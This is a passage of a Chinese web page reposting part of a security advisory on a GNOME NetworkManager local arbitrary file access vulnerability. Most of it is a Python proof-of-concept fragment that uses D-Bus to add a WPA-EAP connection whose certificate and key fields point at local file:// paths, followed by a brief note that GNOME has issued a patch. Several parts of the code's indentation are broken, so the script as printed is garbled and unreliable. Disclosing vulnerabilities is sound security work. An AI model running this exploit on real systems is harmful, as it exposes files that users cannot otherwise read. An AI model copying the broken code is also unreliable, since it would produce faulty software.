GNOME NetworkManager本地任意文件访问漏洞(4)

日期：2020-06-08 栏目：程序人生浏览：次

def addcon(self, params, device, ap = '/'):
    if device[0] != '/':
        if not device in self.devices_by_name:
        print "Error: device not known"
        sys.exit(1)
        device = self.devices_by_name[device]
    if ap[0] != '/' and not 'ssid' in params['802-11-wireless']:
        params['802-11-wireless']['ssid'] = [dbus.Byte(ord(c)) for c in ap]
        if not ap in self.ap_by_ssid:
        print "Warning: ssid not known"
        ap = '/'
    else:
        ap = '/'

self.manager.AddAndActivateConnection(params, device, ap)

if __name__ == '__main__':

from optparse import OptionParser

parser = OptionParser(usage="%prog [options]")
    parser.add_option('--debug', dest="debug", metavar='N',
        action='store', type='int', default=0,
        help="debug level")

(opts, args) = parser.parse_args()
if opts.debug:
_debug_level = opts.debug

dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
mainloop = gobject.MainLoop()

bus = dbus.SystemBus()

nm = NetworkManager()

if len(args) == 0:
    #mainloop.run()
    True
    elif args[0] == 'new':
    conn = {
        'connection': {
            'permissions': [ 'user:joesix:' ],
            'autoconnect': False,
            'type': '802-11-wireless',
            },
        '802-11-wireless': {
            #'ssid': [ dbus.Byte(ord(c)) for c in "something" ],
            'mode': 'infrastructure',
            'security': '802-11-wireless-security',
            },
        '802-1x': {
            'eap': [ 'tls' ], # peap, ttls
            'client-cert': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/cert.pem' ] + [ dbus.Byte(0) ],
            'private-key': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/key.pem' ] + [ dbus.Byte(0) ],
            'ca-cert': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/cacert.pem' ] + [ dbus.Byte(0) ],
            'private-key-password': "12345",
            #'ca-cert': 'hash://server/sha256/5336d308fa263f9f07325baae58ac972876f419527a9bf67c5ede3e668d3a925',
            #'subject-match': '/CN=blah/emailAddress=foo@bar',
            #'phase2-auth': 'mschapv2',
            'identity': 'test1',
            #'password': 'test1',
            },
        '802-11-wireless-security': {
            'key-mgmt': 'wpa-eap',
            'auth-alg': 'open',
            },
    }
    dev = args[1]
    ap = None
    if len(args) > 2:
        ap = args[2]
    nm.addcon(conn, dev, ap)

# vim: sw=4 ts=8 noet

建议：
--------------------------------------------------------------------------------
厂商补丁：

GNOME
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

转载注明出处：https://www.heiqu.com/wwdydf.html

GNOME NetworkManager本地任意文件访问漏洞(4)

相关推荐